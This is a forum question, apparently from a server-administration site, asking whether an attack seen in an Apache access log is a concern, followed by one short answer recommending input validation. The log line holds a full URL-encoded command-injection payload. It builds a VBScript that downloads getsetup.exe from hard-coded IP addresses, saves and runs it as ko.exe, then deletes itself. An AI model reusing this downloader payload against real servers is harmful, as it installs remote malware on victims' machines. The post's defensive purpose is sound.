# Is this new hack attempt something to worry about?

Tags: apache

```
- - [22/Sep/2014:13:54:24 -0600]

"GET /?search==%00{.exec|cmd.exe
+%2Fc
+echo%3E22222.vbs
+dim
+wait%2Cquit%2Cout%3ASet
+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet
+WshShell
+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29
+%3ADS%3DArray%28%22
123.108.109.100
%22%2C%22
123.108.109.100
%3A53%22%2C%22
123.108.109.100
%3A443%22%2C%22
178.33.196.164
%22%2C%22
178.33.196.164
%3A53%22%2C%22
178.33.196.164
%3A443%22%29%3Afor
+each
+Url
+in
+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif
+quit
+then%3Aexit
+for%3Aend
+if%3Anext%3ASub
+D%28Url%29%3Aif
+IsObject%28xml%29%3Dfalse
+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend
+if
+%3Axml.Open
+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait
+and
+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd
+Sub%3Asub
+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4
+Then%3Aexit
+sub%3Aend
+if%3Await%3Dfalse%3Aif
+xml.status%5E%3C%5E%3E200
+then%3Aexit
+sub%3Aend
+if%3Aquit%3Dtrue%3Aon
+error
+resume
+next%3Aset
+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd
+sub%3AWshShell.run
+%22ko.exe%22%2C0%2C0%3ASet
+fso
+%3DCreateObject%28%22Scripting.Filesystemobject%22%29
+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.}

HTTP/1.1" 200 4814
```

Answer (score 1):

This isn't a new attack so to speak.  It is simply an injection attack that is hoping that you have bad parsing on your code.  If you did certain types of processing, this could result in code execution, but it is a fairly elementary attack from the looks of it and isn't a concern as long as you validate user input before putting it through anything that could result in execution.